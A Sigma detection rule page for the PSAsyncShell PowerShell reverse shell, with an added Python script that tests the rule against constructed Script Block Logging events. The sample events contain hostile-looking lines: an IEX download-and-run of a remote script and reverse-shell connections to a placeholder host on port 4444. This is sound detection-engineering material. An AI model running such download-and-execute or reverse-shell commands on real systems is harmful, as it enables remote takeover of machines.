PSAsyncShell - Asynchronous TCP Reverse Shell
Detects the use of PSAsyncShell, an asynchronous TCP reverse shell written in PowerShell
Sigma rule
title: PSAsyncShell - Asynchronous TCP Reverse Shell
id: afd3df04-948d-46f6-ae44-25966c44b97f
status: test
description: Detects the use of PSAsyncShell, an asynchronous TCP reverse shell written in PowerShell
references:
  - https://github.com/JoelGMSec/PSAsyncShell
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-10-04
tags:
  - attack.execution
  - attack.t1059.001
logsource:
  product: windows
  category: ps_script
  definition: 'Requirements: Script Block Logging must be enabled'
detection:
  selection:
    ScriptBlockText|contains: 'PSAsyncShell'
  condition: selection
falsepositives:
  - Unlikely
level: high
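The rule above is a single `contains` match on the ScriptBlockText field of Script Block Logging events (Event ID 4104 in the Microsoft-Windows-PowerShell/Operational log). The Python below is an added example, not part of the Sigma rule or the PSAsyncShell project: it applies the rule's logic to a handful of constructed 4104-style records so the behaviour can be seen end to end. Sigma string matching is case-insensitive by default, so the check is implemented that way. The PSAsyncShell command lines in the sample data are illustrative and the tool's parameters are assumed, not taken from its documentation.

```python
"""Apply the PSAsyncShell Sigma rule's selection to constructed Script Block Logging events."""

# Values copied from the rule above.
RULE_ID = "afd3df04-948d-46f6-ae44-25966c44b97f"
RULE_TITLE = "PSAsyncShell - Asynchronous TCP Reverse Shell"
RULE_LEVEL = "high"
NEEDLE = "PSAsyncShell"  # the rule's only ScriptBlockText|contains value

# logsource product: windows / category: ps_script corresponds to
# Event ID 4104 in Microsoft-Windows-PowerShell/Operational.
PS_SCRIPT_EVENT_ID = 4104

# Constructed sample events, not captured telemetry. Real 4104 records carry
# more fields (ScriptBlockId, MessageNumber, Path, ...). The PSAsyncShell
# invocations are illustrative; the tool's exact parameters are assumed.
SAMPLE_EVENTS = [
    {"EventID": 4104, "Computer": "ws01.corp.example",
     "ScriptBlockText": "Get-ChildItem C:\\Users | Select-Object Name"},
    {"EventID": 4104, "Computer": "ws02.corp.example",
     "ScriptBlockText": "IEX (New-Object Net.WebClient).DownloadString("
                        "'http://192.0.2.10/PSAsyncShell.ps1'); "
                        "PSAsyncShell -Client -Host 192.0.2.10 -Port 4444"},
    # Same tool, lower-cased: Sigma matching is case-insensitive, so this still hits.
    {"EventID": 4104, "Computer": "ws03.corp.example",
     "ScriptBlockText": "psasyncshell -client -host 192.0.2.10 -port 4444"},
    # Hand-rolled TCP reverse shell with no tool name: the rule does not see it.
    {"EventID": 4104, "Computer": "ws04.corp.example",
     "ScriptBlockText": "$c=New-Object Net.Sockets.TCPClient('192.0.2.10',4444)"},
    # Module logging (4103) has no ScriptBlockText field and is outside ps_script.
    {"EventID": 4103, "Computer": "ws05.corp.example",
     "Payload": "CommandInvocation(PSAsyncShell)"},
]


def in_scope(event: dict) -> bool:
    """Apply the rule's logsource: only Script Block Logging (4104) events are considered."""
    return event.get("EventID") == PS_SCRIPT_EVENT_ID


def matches(event: dict) -> bool:
    """Apply the rule's selection: ScriptBlockText|contains 'PSAsyncShell'.

    Sigma compares strings case-insensitively unless a rule says otherwise,
    so a backend compiles this to a case-insensitive substring test. An event
    without a ScriptBlockText field can never satisfy the selection.
    """
    text = event.get("ScriptBlockText")
    if text is None:
        return False
    return NEEDLE.lower() in text.lower()


def run_rule(events: list) -> list:
    """Return one alert dict per event that is in scope and matches the selection."""
    hits = []
    for event in events:
        if in_scope(event) and matches(event):
            hits.append({
                "rule_id": RULE_ID,
                "title": RULE_TITLE,
                "level": RULE_LEVEL,
                "computer": event.get("Computer"),
                "script_block": event["ScriptBlockText"],
            })
    return hits


if __name__ == "__main__":
    for hit in run_rule(SAMPLE_EVENTS):
        print(f"[{hit['level']}] {hit['title']} on {hit['computer']}: {hit['script_block']}")
```

Two points the sample data makes explicit. First, the rule depends entirely on the 4104 channel, which only exists when Script Block Logging is enabled (the policy value is `EnableScriptBlockLogging` = 1 under `HKLM\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging`); with it off, nothing here fires. Second, the selection keys on the tool's name, so a renamed or obfuscated copy, or a hand-written TCP reverse shell like the ws04 record, is not covered and needs a behaviour-based rule alongside this one.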
Related rules
- AWS EC2 Startup Shell Script Change
- Alternate PowerShell Hosts - PowerShell Module
- Bad Opsec Powershell Code Artifacts
- BloodHound Collection Files
- Certificate Exported Via PowerShell